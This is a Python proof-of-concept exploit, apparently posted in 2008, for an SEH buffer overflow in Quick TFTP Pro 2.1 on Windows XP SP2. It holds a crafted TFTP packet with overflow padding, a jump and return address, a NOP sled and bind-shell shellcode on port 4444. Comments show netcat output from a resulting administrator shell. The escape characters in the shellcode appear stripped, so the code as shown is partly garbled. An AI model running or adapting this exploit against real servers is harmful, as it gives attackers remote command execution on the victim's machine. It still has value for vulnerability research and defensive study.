quick-tftp-poc.py.txt
Posted on 27 March 2008
#!/usr/bin/python # Quick TFTP Pro 2.1 SEH Overflow (0day) # Tested on Windows XP SP2. # Coded by Mati Aharoni # muts..at..offensive-security.com # http://www.offensive-security.com/0day/quick-tftp-poc.py.txt ######################################################### # bt ~ # quickftp.py # [*] Quick TFTP Pro 2.1 SEH Overflow (0day) # [*] http://www.offensive-security.com # [*] Sending evil packet, ph33r # [*] Check port 4444 for bindshell # bt ~ # nc -v 172.16.167.130 4444 # (UNKNOWN) [172.16.167.130] 4444 (krb524) open # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:Documents and SettingsAdministrator> ########################################################## import socket import sys print "[*] Quick TFTP Pro 2.1 SEH Overflow (0day)" print "[*] http://www.offensive-security.com" host = '172.16.167.134' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed" sys.exit(1) filename = "pwnd" # windows/shell_bind_tcp - 317 bytes # http://www.metasploit.com # EXITFUNC=thread, LPORT=4444 shell=("xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b" "x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01" "xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07" "xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f" "x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b" "x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c" "x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff" "xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0" "x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08" "x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53" "x53x53x53x53x43x53x43x53xffxd0x66x68x11x5cx66" "x53x89xe1x95x68xa4x1ax70xc7x57xffxd6x6ax10x51" "x55xffxd0x68xa4xadx2exe9x57xffxd6x53x55xffxd0" "x68xe5x49x86x49x57xffxd6x50x54x54x55xffxd0x93" "x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64x66" "x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89" "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38" "xabxabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57" "x52x51x51x51x6ax01x51x51x55x51xffxd0x68xadxd9" "x05xcex53xffxd6x6axffxffx37xffxd0x8bx57xfcx83" "xc4x64xffxd6x52xffxd0x68xefxcexe0x60x53xffxd6" "xffxd0") mode = "A"*1019+"xebx08x90x90"+"x58x14xd3x74"+"x90"*16+shell muha = "x00x02" + filename+ "�" + mode + "�" print "[*] Sending evil packet, ph33r" s.sendto(muha, (host, port)) print "[*] Check port 4444 for bindshell"
